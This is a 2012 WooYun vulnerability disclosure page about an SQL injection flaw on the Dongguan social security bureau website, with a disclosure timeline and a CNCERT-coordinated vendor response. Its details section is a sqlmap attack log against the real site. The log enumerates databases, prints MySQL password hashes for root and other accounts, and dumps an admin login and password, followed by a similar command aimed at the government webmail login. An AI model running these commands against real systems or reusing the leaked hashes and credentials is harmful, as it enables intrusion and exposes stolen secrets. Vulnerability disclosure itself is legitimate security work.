当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09425

漏洞标题:广东东莞社保局存在注射漏洞

相关厂商:广东东莞社保局

漏洞作者: 小乖

提交时间:2012-07-10 15:28

修复时间:2012-08-24 15:29

公开时间:2012-08-24 15:29

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-10: 细节已通知厂商并且等待厂商处理中
2012-07-12: 厂商已经确认,细节仅向厂商公开
2012-07-22: 细节向核心白帽子及相关领域专家公开
2012-08-01: 细节向普通白帽子公开
2012-08-11: 细节向实习白帽子公开
2012-08-24: 细节向公众公开

简要描述:

Sql注入,0.0貌似有点个人信息...别跨我啊

详细说明:

sqlmap.py -u "http://dgsi.dg.gov.cn/wzxx/search.do?key=88952634&keyID=1 key=88952634" --dbs
[16:02:30] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[16:02:30] [INFO] fetching database names
[16:02:32] [INFO] the SQL query used returns 5 entries
[16:02:35] [INFO] retrieved: information_schema
[16:02:37] [INFO] retrieved: dongguanshebao
[16:02:40] [INFO] retrieved: mysql
[16:02:42] [INFO] retrieved: shebaoju
[16:02:44] [INFO] retrieved: test
available databases [5]:
[*] dongguanshebao
[*] information_schema
[*] mysql
[*] shebaoju
[*] test
database management system users password hashes:
[*] jiankongbao [1]:
password hash: *94DF4DC1118E15A114EC1FE0F6F4511FB9E98DDA
[*] myweb [1]:
password hash: *FBA3E4668AEF04F0ABE18AABA3C7ED9F65A0BA35
[*] root [1]:
password hash: *A149900464FA0EDC2292441115E57C9F22B55846
sqlmap.py -u "http://dgsi.dg.gov.cn/wzxx/search.do?key=88952634&keyID=1 key=88952634" -D shebaoju --tables
[15 tables]
+--------------+
| da |
| diao |
| diaocha |
| gg |
| guanli |
| jingsai |
| jishu |
| lanmu |
| lianjie |
| liuyan |
| moban |
| news |
| sheyingclass |
| waplanmu |
| zyz |
+--------------+
sqlmap.py -u "http://dgsi.dg.gov.cn/wzxx/search.do?key=88952634&keyID=1 key=88952634" -D shebaoju -T guanli --columns
sqlmap.py -u "http://dgsi.dg.gov.cn/wzxx/search.do?key=88952634&keyID=1 key=88952634" -D shebaoju -T guanli -C pid,name,psd --threads 10 --dump
1 | admina1b2c3 | admin123


http://webmail.dg.gov.cn/LoginAction/userLogin.do --data "name=88952634&password=88952634" --current-db --dbs

漏洞证明:

上面

修复方案:

你懂的

版权声明:转载请注明来源 小乖@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-07-12 09:32

厂商回复:

添加对漏洞的补充说明以及做出评价的理由

最新状态:

2012-07-12:上午确认未进行说明,现补充相关情况:CNVD确认并复现所述情况,转由CNCERT广东分中心协调涉事单位处置。按完全影响机密性进行评分(未测试提权相关操作),rank=7.79*1.0*1.3(较严重,存在信息泄露风险)=10.127